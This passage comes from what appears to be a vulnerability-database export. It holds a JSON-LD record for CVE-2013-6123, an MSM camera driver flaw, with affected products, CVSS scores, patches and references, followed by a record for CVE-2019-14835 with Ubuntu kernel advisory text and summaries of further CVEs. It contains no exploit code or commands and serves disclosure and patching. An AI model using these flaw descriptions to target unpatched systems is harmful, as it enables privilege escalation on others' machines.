      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0143",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "android-msm",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "codeaurora",
        "version": "2.6.29"
      },
      {
        "model": "quic mobile station modem kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "qualcomm",
        "version": "3.10"
      },
      {
        "model": "android for msm",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "android for msm",
        "version": "2.6.29"
      },
      {
        "model": "quic mobile station modem",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "qualcomm",
        "version": "3.10"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "13.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.10"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux enterprise server for vmware sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise high availability extension sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise desktop sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise server sp1 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "12.3"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.74"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "qrd android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "codeaurora",
        "version": "0"
      },
      {
        "model": "firefox os for msm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "codeaurora",
        "version": "0"
      },
      {
        "model": "android for msm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "codeaurora",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:codeaurora:android-msm:2.6.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:qualcomm:quic_mobile_station_modem_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Andrew Honig of Google",
    "sources": [
      {
        "db": "BID",
        "id": "64328"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-6123",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 6.9,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-6123",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-66125",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-6123",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201401-189",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-66125",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple array index errors in drivers/media/video/msm/server/msm_cam_server.c in the MSM camera driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allow attackers to gain privileges by leveraging camera device-node access, related to the (1) msm_ctrl_cmd_done, (2) msm_ioctl_server, and (3) msm_server_send_ctrl functions. The Linux kernel is prone to a local privilege-escalation vulnerability. \nLocal attackers can exploit this issue to gain elevated privileges on affected computers. Other attacks are also possible. Android for MSM is an Android MSM project, the main purpose of this project is to build an Android platform that includes Qualcomm MSM chipset",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-6123",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "64979",
        "trust": 0.4
      },
      {
        "db": "BID",
        "id": "64328",
        "trust": 0.3
      },
      {
        "db": "VULHUB",
        "id": "VHN-66125",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "id": "VAR-201401-0143",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:44:16.814000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "QCIR-2014-00001-1",
        "trust": 0.8,
        "url": "https://www.codeaurora.org/projects/security-advisories/out-bounds-array-access-camera-driver-cve-2013-6123"
      },
      {
        "title": "msm: camera: Bounds and validity check for params",
        "trust": 0.8,
        "url": "https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=60e4af06161d91d5aeaa04c7d6e9f4345a6acdd4"
      },
      {
        "title": "msm: camera: Added bounds check for index parameter",
        "trust": 0.8,
        "url": "https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=7beb04ea945a7178e61d935918d3cb152996b558"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "https://www.codeaurora.org/projects/security-advisories/out-bounds-array-access-camera-driver-cve-2013-6123"
      },
      {
        "trust": 1.7,
        "url": "https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=60e4af06161d91d5aeaa04c7d6e9f4345a6acdd4"
      },
      {
        "trust": 1.7,
        "url": "https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=7beb04ea945a7178e61d935918d3cb152996b558"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90505"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6123"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6123"
      },
      {
        "trust": 0.6,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://lists.centos.org/pipermail/centos-announce/2013-december/020095.html"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=338c7dbadd2671189cec7faf64c84d01071b3f96"
      },
      {
        "trust": 0.3,
        "url": "http://linux.oracle.com/errata/elsa-2014-3034.html"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-01-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "date": "2013-12-14T00:00:00",
        "db": "BID",
        "id": "64328"
      },
      {
        "date": "2014-01-14T00:00:00",
        "db": "BID",
        "id": "64979"
      },
      {
        "date": "2014-01-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "date": "2014-01-14T04:29:56.923000",
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "date": "2014-01-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66125"
      },
      {
        "date": "2015-04-13T22:23:00",
        "db": "BID",
        "id": "64328"
      },
      {
        "date": "2014-01-14T00:00:00",
        "db": "BID",
        "id": "64979"
      },
      {
        "date": "2014-01-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      },
      {
        "date": "2017-08-29T01:33:54.920000",
        "db": "NVD",
        "id": "CVE-2013-6123"
      },
      {
        "date": "2014-01-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-189"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MSM For devices  Qualcomm Innovation Center Android Used for contributions etc.  Linux Kernel for  MSM Vulnerabilities that can be obtained in the camera driver",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005846"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Boundary Condition Error",
    "sources": [
      {
        "db": "BID",
        "id": "64328"
      },
      {
        "db": "BID",
        "id": "64979"
      }
    ],
    "trust": 0.6
  }
}

var-201909-0695
Vulnerability from variot

A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel's vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64

  1. (CVE-2019-14835)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. (CVE-2019-15031)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.04: linux-image-5.0.0-1016-aws 5.0.0-1016.18 linux-image-5.0.0-1017-gcp 5.0.0-1017.17 linux-image-5.0.0-1017-kvm 5.0.0-1017.18 linux-image-5.0.0-1017-raspi2 5.0.0-1017.17 linux-image-5.0.0-1020-azure 5.0.0-1020.21 linux-image-5.0.0-1021-snapdragon 5.0.0-1021.22 linux-image-5.0.0-29-generic 5.0.0-29.31 linux-image-5.0.0-29-generic-lpae 5.0.0-29.31 linux-image-5.0.0-29-lowlatency 5.0.0-29.31 linux-image-aws 5.0.0.1016.17 linux-image-azure 5.0.0.1020.19 linux-image-gcp 5.0.0.1017.43 linux-image-generic 5.0.0.29.30 linux-image-generic-lpae 5.0.0.29.30 linux-image-gke 5.0.0.1017.43 linux-image-kvm 5.0.0.1017.17 linux-image-lowlatency 5.0.0.29.30 linux-image-raspi2 5.0.0.1017.14 linux-image-snapdragon 5.0.0.1021.14 linux-image-virtual 5.0.0.29.30

Ubuntu 18.04 LTS: linux-image-4.15.0-1025-oracle 4.15.0-1025.28 linux-image-4.15.0-1044-gcp 4.15.0-1044.70 linux-image-4.15.0-1044-gke 4.15.0-1044.46 linux-image-4.15.0-1046-kvm 4.15.0-1046.46 linux-image-4.15.0-1047-raspi2 4.15.0-1047.51 linux-image-4.15.0-1050-aws 4.15.0-1050.52 linux-image-4.15.0-1056-oem 4.15.0-1056.65 linux-image-4.15.0-1064-snapdragon 4.15.0-1064.71 linux-image-4.15.0-64-generic 4.15.0-64.73 linux-image-4.15.0-64-generic-lpae 4.15.0-64.73 linux-image-4.15.0-64-lowlatency 4.15.0-64.73 linux-image-5.0.0-1017-gke 5.0.0-1017.17~18.04.1 linux-image-5.0.0-1020-azure 5.0.0-1020.21~18.04.1 linux-image-5.0.0-29-generic 5.0.0-29.31~18.04.1 linux-image-5.0.0-29-generic-lpae 5.0.0-29.31~18.04.1 linux-image-5.0.0-29-lowlatency 5.0.0-29.31~18.04.1 linux-image-aws 4.15.0.1050.49 linux-image-azure 5.0.0.1020.30 linux-image-gcp 4.15.0.1044.70 linux-image-generic 4.15.0.64.66 linux-image-generic-hwe-18.04 5.0.0.29.86 linux-image-generic-lpae 4.15.0.64.66 linux-image-generic-lpae-hwe-18.04 5.0.0.29.86 linux-image-gke 4.15.0.1044.47 linux-image-gke-4.15 4.15.0.1044.47 linux-image-gke-5.0 5.0.0.1017.7 linux-image-kvm 4.15.0.1046.46 linux-image-lowlatency 4.15.0.64.66 linux-image-lowlatency-hwe-18.04 5.0.0.29.86 linux-image-oem 4.15.0.1056.60 linux-image-oracle 4.15.0.1025.28 linux-image-powerpc-e500mc 4.15.0.64.66 linux-image-powerpc-smp 4.15.0.64.66 linux-image-powerpc64-emb 4.15.0.64.66 linux-image-powerpc64-smp 4.15.0.64.66 linux-image-raspi2 4.15.0.1047.45 linux-image-snapdragon 4.15.0.1064.67 linux-image-snapdragon-hwe-18.04 5.0.0.29.86 linux-image-virtual 4.15.0.64.66 linux-image-virtual-hwe-18.04 5.0.0.29.86

Ubuntu 16.04 LTS: linux-image-4.15.0-1025-oracle 4.15.0-1025.28~16.04.1 linux-image-4.15.0-1044-gcp 4.15.0-1044.46 linux-image-4.15.0-1050-aws 4.15.0-1050.52~16.04.1 linux-image-4.15.0-1059-azure 4.15.0-1059.64 linux-image-4.15.0-64-generic 4.15.0-64.73~16.04.1 linux-image-4.15.0-64-generic-lpae 4.15.0-64.73~16.04.1 linux-image-4.15.0-64-lowlatency 4.15.0-64.73~16.04.1 linux-image-4.4.0-1058-kvm 4.4.0-1058.65 linux-image-4.4.0-1094-aws 4.4.0-1094.105 linux-image-4.4.0-1122-raspi2 4.4.0-1122.131 linux-image-4.4.0-1126-snapdragon 4.4.0-1126.132 linux-image-4.4.0-164-generic 4.4.0-164.192 linux-image-4.4.0-164-generic-lpae 4.4.0-164.192 linux-image-4.4.0-164-lowlatency 4.4.0-164.192 linux-image-4.4.0-164-powerpc-e500mc 4.4.0-164.192 linux-image-4.4.0-164-powerpc-smp 4.4.0-164.192 linux-image-4.4.0-164-powerpc64-emb 4.4.0-164.192 linux-image-4.4.0-164-powerpc64-smp 4.4.0-164.192 linux-image-aws 4.4.0.1094.98 linux-image-aws-hwe 4.15.0.1050.50 linux-image-azure 4.15.0.1059.62 linux-image-gcp 4.15.0.1044.58 linux-image-generic 4.4.0.164.172 linux-image-generic-hwe-16.04 4.15.0.64.84 linux-image-generic-lpae 4.4.0.164.172 linux-image-generic-lpae-hwe-16.04 4.15.0.64.84 linux-image-gke 4.15.0.1044.58 linux-image-kvm 4.4.0.1058.58 linux-image-lowlatency 4.4.0.164.172 linux-image-lowlatency-hwe-16.04 4.15.0.64.84 linux-image-oem 4.15.0.64.84 linux-image-oracle 4.15.0.1025.18 linux-image-powerpc-e500mc 4.4.0.164.172 linux-image-powerpc-smp 4.4.0.164.172 linux-image-powerpc64-emb 4.4.0.164.172 linux-image-powerpc64-smp 4.4.0.164.172 linux-image-raspi2 4.4.0.1122.122 linux-image-snapdragon 4.4.0.1126.118 linux-image-virtual 4.4.0.164.172 linux-image-virtual-hwe-16.04 4.15.0.64.84

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. ========================================================================== Kernel Live Patch Security Notice 0058-1 October 22, 2019

linux vulnerability

A security issue affects these releases of Ubuntu:

| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem | | Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux: Linux kernel

Details:

It was discovered that a race condition existed in the GFS2 file system in the Linux kernel. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2016-10905)

It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)

It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-20961)

It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-20976)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-21008)

It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). A physically proximate attacker could use this to cause a denial of service (Wi-Fi disconnect). (CVE-2019-0136)

It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. A local attacker could possibly use this to bypass seccomp restrictions. (CVE-2019-2054)

It was discovered that an integer overflow existed in the Binder implementation of the Linux kernel, leading to a buffer overflow. A local attacker could use this to escalate privileges. (CVE-2019-2181)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)

It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)

It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. A local attacker could use this to cause a denial of service. (CVE-2019-10207)

Jonathan Looney discovered that an integer overflow existed in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service (system crash). (CVE-2019-11477)

Jonathan Looney discovered that the TCP retransmission queue implementation in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. (CVE-2019-11478)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)

